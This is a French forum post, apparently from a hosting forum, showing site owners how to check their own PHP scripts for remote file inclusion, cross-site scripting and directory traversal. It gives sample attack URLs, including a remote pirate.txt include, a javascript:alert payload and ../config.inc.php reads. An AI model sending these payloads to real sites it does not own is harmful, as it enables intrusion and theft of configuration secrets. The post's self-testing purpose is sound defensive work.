Comment tester la sécurité de mon site web?
Voici 3 méthodes simples qui vous permettront de vérifier si vous utilisez un script avec de grosses failles de sécurité. Avec un filtrage des données entrantes et les conseils donnés dans ce forum, vous devriez être capable de régler le problème. Sinon, pour votre sécurité, changez de blog, forum, cms, gallery, wiki car le développeur ne s'est pas préoccupé de la sécurité.
D'après mes logs, les 3 attaques suivantes représentent la grosse majorité. Ces failles sont si énormes que les pirates les cherchent en premier. Ils sont comme nous, adeptes du moindre effort.
REMARQUE 1: aucun de ces exemples ne vous apprendra à pirater un site. Il en faut bien plus et c'est plus compliqué que ça. Cependant, vous saurez si votre script est mal codé ou non.
REMARQUE 2: Désactivez les règles de filtrages du fichier htaccess proposées ici: http://forum.ovh.net/showpost.php?p=103757 . En effet, ces règles vont stopper la plupart des attaques présentées ci-dessous en vous envoyant une erreur "403 Forbidden". Donc, pour savoir si votre script est faillible, désactivez ces règles et s'il y a une faille, corrigez le script ou installez-en un autre mieux sécurisé.
1- Attaque par exécution d'un script externe:
Créez un fichier texte contenant le code suivant:
PHP:
echo "Hackeur vaillant, rien d'impossible !!";
?>
Dans votre blog, forum, cms, gallery, wiki, les URLs ressemblent à ça (à adapter à votre cas):
Code:
http://www.votredomaine.tld/index.php?page=123
Code:
http://www.votredomaine.tld/index.php?page=http://www.votredomaine.tld/pirate.txt?
Code:
http://www.votredomaine.tld/index.php?page=http://www.votredomaine.tld/pirate.php?
Code:
http://www.votredomaine.tld/index.php?page=http://www.autresiteweb.tld/pirate.txt?
On utilise le javascript pour prendre le contrôle de votre blog, forum, cms, gallery, wiki.
Vos URLs ressemblent à ça (à adapter à votre cas):
Code:
http ://www.votredomaine.tld/index.php?page=123
Code:
http ://www.votredomaine.tld/index.php?page=">
Code:
http://www.votredomaine.tld/index.php?page=javascript:alert(%22Hackeur vaillant, rien d'impossible !!%22)
3- Faille dans le téléchargement de fichiers:
Cela s'applique à 2 cas:
a) Vous avez un script de téléchargement qui propose à vos visiteurs de télécharger des fichiers. Vous avez mis tous les fichiers à télécharger dans un dossier de votre hébergement, par exemple /home/loginftp/www/download/ .
Votre URL ressemble à ça (à adapter à votre cas):
Code:
http://www.votredomaine.tld/download.php?fichier=monfichier.pdf
Code:
http://www.votredomaine.tld/download.php?fichier=../config.inc.php
b) Vous avez un script PHP qui utilise la fonction include() pour appeler d'autres fichiers. Ces fichiers sont appelés depuis l'URL et non dans le code PHP du script. Par exemple:
Code:
http://www.votredomaine.tld/index.php?page=forum.php
Code:
http://www.votredomaine.tld/index.php?page=robots.txt
Code:
http://www.votredomaine.tld/index.php?page=config.inc.php
Code:
http://www.votredomaine.tld/index.php?page=http://www.autresite.tld
Comme je regrette le temps des pages statiques en html ! est ma devise